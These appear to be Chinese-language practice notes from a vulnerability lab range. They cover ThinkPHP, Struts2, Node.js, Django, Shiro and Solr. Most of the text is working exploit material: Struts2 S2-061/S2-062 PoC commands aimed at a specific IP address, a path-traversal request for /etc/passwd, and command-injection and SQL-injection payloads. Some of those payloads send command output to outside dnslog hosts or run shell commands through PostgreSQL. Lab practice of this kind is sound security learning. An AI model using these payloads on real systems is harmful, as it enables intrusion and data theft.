关闭靶场
sudo docker-compose down
运行此靶场
sudo docker-compose up -d
查看启动环境
sudo docker ps
运行dockers容器
docker exec -it 64052abd288b /bin/bash
thinkphp框架
thinkphp 2 - rce漏洞复现
docker exec -it 731dbae0e0b5 /bin/bash
集成化工具扫描
可以命令执行
thinkphp/5.0.23-rce
集成化工具利用
thinkphp/5-rce
直接梭哈
thinkphp/in-sqlinjection
Struts2
S2-009
梭哈
struts2 命令执行 (CVE-2016-3081)
直接梭哈
061rce和nc
python3 struts2-061-poc.py http://123.58.224.8:64423 "ls /tmp"
python2 S2-061-shell.py http://123.58.224.8:64423
S2-062
python3 s2-062.py --url http://123.58.224.8:25807 --cmd whoami
靶场无回显
Node.js
目录穿越
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
CVE-2021-21315
Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315
配合dnslog。Cn带外检测
/api/getServices?name[]=$(ping%20`ls%20/tmp`.5afckd.dnslog.cn)
Django
CVE-2019-14234
单引号已注入成功,SQL 语句报错:
/admin/vuln/collection/?detail__a%27b=123
创建 cmd_exec:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20
调用 cmd_exec 执行命令:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping 37p5oe.dmp4tj.dnslog.cn%27--%20
/shiro-721
shiro-cve_2016_4437
solr
